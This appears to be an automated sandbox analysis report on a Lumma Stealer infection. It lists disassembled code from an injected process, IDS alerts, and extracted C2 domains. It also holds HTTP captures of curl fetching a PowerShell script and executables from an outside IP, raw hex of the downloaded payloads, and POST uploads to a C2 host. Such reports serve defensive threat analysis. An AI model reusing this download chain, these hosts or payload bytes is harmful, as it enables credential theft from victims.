Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]	7_2_0040E83B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	7_2_0043B05B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	7_2_0043B05B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_0040A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, ecx	7_2_0040A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	7_2_0043C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	7_2_0043B195
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movsx eax, byte ptr [esi]	7_2_0043B9A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	7_2_004369A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	7_2_0041E9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_004299B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [esp+18h]	7_2_0042526A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, edi	7_2_0041D270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, eax	7_2_00423A34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h	7_2_0043D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, word ptr [eax]	7_2_0043D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	7_2_0043C280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_0043AAB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebp+00h], 0000h	7_2_004252BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	7_2_004252BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebx	7_2_0041CB05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	7_2_00427326
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_004143C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esp+34h]	7_2_004143C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	7_2_0042A3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, dword ptr [eax]	7_2_00436C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+64h]	7_2_00418578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	7_2_0042750D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_00421D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, edx	7_2_0040BDC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]	7_2_00417582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]	7_2_00427DA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h	7_2_004205B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0042C64A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_0042AE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	7_2_00426E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	7_2_0042B4F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_0042B4F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_0042AE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	7_2_00433630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0042C6E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	7_2_00425E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h	7_2_0043CE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_004166A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_0041BEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_0042ADF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, edx	7_2_0041C6BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	7_2_0043BF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	7_2_0043A777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]	7_2_00409700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h]	7_2_00409700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]	7_2_00409700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0042C726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0042C735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	7_2_0041DF80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	7_2_0040D7A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	7_2_0040D7A2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 147.45.44.131:80 -> 192.168.11.20:49710
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49712 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49711 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49712 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49711 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49718 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49714 -> 172.67.207.38:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: effecterectz.xyz

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 16:33:56 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 12 Dec 2024 14:33:42 GMTETag: "b200-6291399decf3b"Accept-Ranges: bytesContent-Length: 45568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 ca 14 bd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 08 00 00 00 e0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c3 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 22 00 00 e8 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 1
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 16:33:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 12 Dec 2024 14:31:40 GMTETag: "47e00-6291392989375"Accept-Ranges: bytesContent-Length: 294400Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 ae 00 00 00 00 00 00 90 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 fb 03 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 dc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c fd 03 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 cb 03 00 00 10 00 00 00 cc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 20 00 00 00 e0 03 00 00 22 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 f6 00 00 00 10 04 00 00 50 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 10 05 00 00 02 00 00 00 42 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 39 00 00 00 20 05 00 00 3a 00 00 00 44 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /infopage/nghp.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/ilk.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131

Source: Joe Sandbox View

IP Address: 147.45.44.131 147.45.44.131

Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49712 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49714 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49711 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49716 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49718 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49715 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49717 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.11.20:49710 -> 147.45.44.131:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49713 -> 172.67.207.38:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QP2EQTZBZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20488Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C3LWZ7G84HI7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 10903Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UADEEVLT2AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20520Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2L142YZ0IX4WKDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1256Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QOGKQY9Z8PPSYK8TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1047224Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: immureprech.biz

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic	HTTP traffic detected: GET /infopage/bgfi.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.55.1Accept: /X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Source: global traffic	HTTP traffic detected: GET /infopage/nghp.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/ilk.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131

Source: global traffic

DNS traffic detected: DNS query: immureprech.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz

Source: powershell.exe, 00000004.00000002.4100255079.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopag4
Source: powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopag4v2
Source: curl.exe, 00000003.00000002.4069751364.0000000002FB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bgfi.ps1
Source: curl.exe, 00000003.00000002.4070019768.000000000318B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bgfi.ps18=S
Source: curl.exe, 00000003.00000002.4070019768.0000000003180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bgfi.ps18O4
Source: curl.exe, 00000003.00000002.4070019768.000000000318B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bgfi.ps1V=y
